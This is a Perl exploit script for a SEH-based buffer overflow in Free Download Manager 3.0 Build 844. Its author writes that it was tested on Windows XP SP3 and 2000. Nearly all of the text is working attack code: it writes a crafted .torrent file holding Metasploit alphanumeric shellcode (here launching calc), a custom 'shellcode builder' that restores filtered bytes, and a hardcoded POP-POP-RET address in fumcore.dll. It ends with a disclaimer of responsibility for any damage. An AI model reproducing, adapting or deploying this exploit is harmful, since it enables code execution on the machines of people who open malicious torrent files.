#!/usr/bin/perl # # Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit # ----------------------------------------------------------- # Exploit by SkD (skdrat@hotmail.com) # # Vendors URL = # [www.freedownloadmanager.org] # Download FDM 3.0 Build 844 = # [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html] # (Downloaded by over 1.6 million users!) # # This is another one of the more advanced exploitation methods # for buffer overflows using my method called "shell building". # It utilizes a SEH overflow and then a shellcode builder/assembler # "builds"/or "assembles" bytes that were deleted by transformation # of the buffer so that the shellcode will work without a flaw. # I have been able to do this because of my recent experiences with # UNICODE based overflows (heap & stack). This is a demonstration # of how you can obtain power with limitations to buffer. # Of course I could have used my shellhunting technique, # but this is a new method, and to demonstrate it in a world of # dying buffer overflows is important for me. # # Unfortunately I did not have time to make this a universal exploit # so it will only work on all NT systems EXCEPT Vista (due to randomized # heap, etc). But with a few modifications it can work (sure of it). # Read my notes & comments in the script for more info. # # Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4. # # Note: Author has no responsibility over the damage you do with this!
use strict; use warnings;
my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D". "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20". "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68". "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A"; my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73". "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49". #Notice I added 0x01 byte before each 0x80=> byte. "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47". "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38". "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48". "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58". "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33". "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37". "\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a". "\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". "\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53". "\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37". "\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59". "\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56". "\x4e\x36\x43\x46\x42\x30\x5a";
#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does #the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes). #You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add #0x01 before each 0x80=> byte. my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3). ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2). ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11). ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01"); my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc). my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location. my $overflow1 = "\x41" x 10000; my $overflow2 = "\x41" x $len; my $sled = "\x41" x (350 - length($shellcode_builder)); my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;) my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)
open(my $torrent, "> s.torrent"); print $torrent $tdata1. $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2. $tdata2; close $torrent;
|